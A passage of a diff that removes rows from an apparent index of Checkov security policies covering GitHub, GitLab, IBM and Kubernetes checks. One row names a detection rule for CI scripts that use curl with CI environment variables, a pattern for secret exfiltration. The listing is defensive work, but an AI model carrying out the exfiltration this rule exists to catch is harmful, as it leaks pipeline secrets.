-| 2398 | CKV_GITHUB_22 | github_configuration | * | Ensure private repository creation is limited to specific members | github_configuration | [private_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/private_repository_creation_is_limited.py) |
-| 2399 | CKV_GITHUB_23 | github_configuration | * | Ensure internal repository creation is limited to specific members | github_configuration | [internal_repository_creation_is_limited.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/internal_repository_creation_is_limited.py) |
-| 2400 | CKV_GITHUB_26 | github_configuration | * | Ensure minimum admins are set for the organization | github_configuration | [minimum_admins_in_org.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/minimum_admins_in_org.py) |
-| 2401 | CKV_GITHUB_27 | github_configuration | * | Ensure strict base permissions are set for repositories | github_configuration | [require_strict_base_permissions_repository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_strict_base_permissions_repository.py) |
-| 2402 | CKV_GITHUB_28 | github_configuration | * | Ensure an organization's identity is confirmed with a Verified badge Passed | github_configuration | [require_verified_organization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/github/checks/require_verified_organization.py) |
-| 2403 | CKV_GITLAB_1 | gitlab_configuration | * | Merge requests should require at least 2 approvals | gitlab_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/merge_requests_approvals.py) |
-| 2404 | CKV_GITLAB_2 | gitlab_configuration | * | Ensure all Gitlab groups require two factor authentication 
| gitlab_configuration | [two_factor_authentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab/checks/two_factor_authentication.py) |
-| 2405 | CKV_GITLABCI_1 | jobs | *.script[] | Suspicious use of curl with CI environment variables in script | gitlab_ci | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py) |
-| 2406 | CKV_GITLABCI_2 | jobs | *.rules | Avoid creating rules that generate double pipelines | gitlab_ci | [AvoidDoublePipelines.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py) |
-| 2407 | CKV_GITLABCI_3 | jobs | *.image[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) |
-| 2408 | CKV_GITLABCI_3 | jobs | *.services[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) |
-| 2409 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) |
-| 2410 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) |
-| 2411 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) |
-| 2412 | CKV_GLB_4 | resource | gitlab_project | Ensure 
GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) |
-| 2413 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) |
-| 2414 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) |
-| 2415 | CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) |
-| 2416 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) |
-| 2417 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) |
-| 2418 | CKV2_IBM_6 | resource | ibm_database | Ensure Databases network access is restricted to a specific IP range | Terraform | 
[IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml) |
-| 2419 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) |
-| 2420 | CKV_K8S_1 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host process ID namespace | Kubernetes | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py) |
-| 2421 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) |
-| 2422 | CKV_K8S_2 | resource | PodSecurityPolicy | Do not admit privileged containers | Kubernetes | [PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py) |
-| 2423 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) |
-| 2424 | CKV_K8S_3 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host IPC namespace | Kubernetes | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py) |
-| 2425 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing 
to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) |
-| 2426 | CKV_K8S_4 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host network namespace | Kubernetes | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py) |
-| 2427 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) |
-| 2428 | CKV_K8S_5 | resource | PodSecurityPolicy | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py) |
-| 2429 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) |
-| 2430 | CKV_K8S_6 | resource | PodSecurityPolicy | Do not admit root containers | Kubernetes | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py) |
-| 2431 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) |
-| 2432 | CKV_K8S_7 | resource | PodSecurityPolicy | Do not admit containers with the NET_RAW capability | Kubernetes | 
[DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py) |
-| 2433 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) |
-| 2434 | CKV_K8S_8 | resource | DaemonSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2435 | CKV_K8S_8 | resource | Deployment | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2436 | CKV_K8S_8 | resource | DeploymentConfig | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2437 | CKV_K8S_8 | resource | Pod | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2438 | CKV_K8S_8 | resource | PodTemplate | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2439 | CKV_K8S_8 | resource | ReplicaSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2440 | CKV_K8S_8 | resource | ReplicationController | Liveness Probe Should be Configured | Kubernetes | 
[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2441 | CKV_K8S_8 | resource | StatefulSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) |
-| 2442 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 2443 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 2444 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 2445 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) |
-| 2446 | CKV_K8S_9 | resource | DaemonSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2447 | CKV_K8S_9 | resource | Deployment | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2448 | CKV_K8S_9 | resource | DeploymentConfig | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2449 | CKV_K8S_9 | resource | Pod | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2450 | CKV_K8S_9 | resource | PodTemplate | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2451 | CKV_K8S_9 | resource | ReplicaSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2452 | CKV_K8S_9 | resource | ReplicationController | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2453 | CKV_K8S_9 | resource | StatefulSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) |
-| 2454 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 2455 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 2456 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) |
-| 2457 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | 
[ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2458 | CKV_K8S_10 | resource | CronJob | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2459 | CKV_K8S_10 | resource | DaemonSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2460 | CKV_K8S_10 | resource | Deployment | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2461 | CKV_K8S_10 | resource | DeploymentConfig | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2462 | CKV_K8S_10 | resource | Job | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2463 | CKV_K8S_10 | resource | Pod | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2464 | CKV_K8S_10 | resource | PodTemplate | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2465 | CKV_K8S_10 | resource | ReplicaSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2466 | CKV_K8S_10 | resource | ReplicationController | CPU requests should be set | Kubernetes | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2467 | CKV_K8S_10 | resource | StatefulSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2468 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2469 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2470 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2471 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2472 | CKV_K8S_11 | resource | CronJob | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2473 | CKV_K8S_11 | resource | DaemonSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2474 | CKV_K8S_11 | resource | Deployment | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2475 | CKV_K8S_11 | resource | DeploymentConfig | CPU limits should be set | Kubernetes | 
[CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2476 | CKV_K8S_11 | resource | Job | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2477 | CKV_K8S_11 | resource | Pod | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2478 | CKV_K8S_11 | resource | PodTemplate | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2479 | CKV_K8S_11 | resource | ReplicaSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2480 | CKV_K8S_11 | resource | ReplicationController | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2481 | CKV_K8S_11 | resource | StatefulSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2482 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2483 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2484 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | 
[CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2485 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2486 | CKV_K8S_12 | resource | CronJob | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2487 | CKV_K8S_12 | resource | DaemonSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2488 | CKV_K8S_12 | resource | Deployment | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2489 | CKV_K8S_12 | resource | DeploymentConfig | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2490 | CKV_K8S_12 | resource | Job | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2491 | CKV_K8S_12 | resource | Pod | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2492 | CKV_K8S_12 | resource | PodTemplate | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2493 | CKV_K8S_12 | resource | ReplicaSet | Memory requests should be set | Kubernetes | 
[MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2494 | CKV_K8S_12 | resource | ReplicationController | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2495 | CKV_K8S_12 | resource | StatefulSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2496 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2497 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2498 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2499 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2500 | CKV_K8S_13 | resource | CronJob | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2501 | CKV_K8S_13 | resource | DaemonSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2502 | CKV_K8S_13 | resource | Deployment | Memory limits 
should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2503 | CKV_K8S_13 | resource | DeploymentConfig | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2504 | CKV_K8S_13 | resource | Job | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2505 | CKV_K8S_13 | resource | Pod | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2506 | CKV_K8S_13 | resource | PodTemplate | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2507 | CKV_K8S_13 | resource | ReplicaSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2508 | CKV_K8S_13 | resource | ReplicationController | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2509 | CKV_K8S_13 | resource | StatefulSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2510 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2511 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be 
set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2512 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2513 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2514 | CKV_K8S_14 | resource | CronJob | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2515 | CKV_K8S_14 | resource | DaemonSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2516 | CKV_K8S_14 | resource | Deployment | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2517 | CKV_K8S_14 | resource | DeploymentConfig | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2518 | CKV_K8S_14 | resource | Job | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2519 | CKV_K8S_14 | resource | Pod | Image Tag should be fixed - not latest or blank | Kubernetes | 
[ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2520 | CKV_K8S_14 | resource | PodTemplate | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2521 | CKV_K8S_14 | resource | ReplicaSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2522 | CKV_K8S_14 | resource | ReplicationController | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2523 | CKV_K8S_14 | resource | StatefulSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2524 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2525 | CKV_K8S_14 | resource | kubernetes_deployment_v1 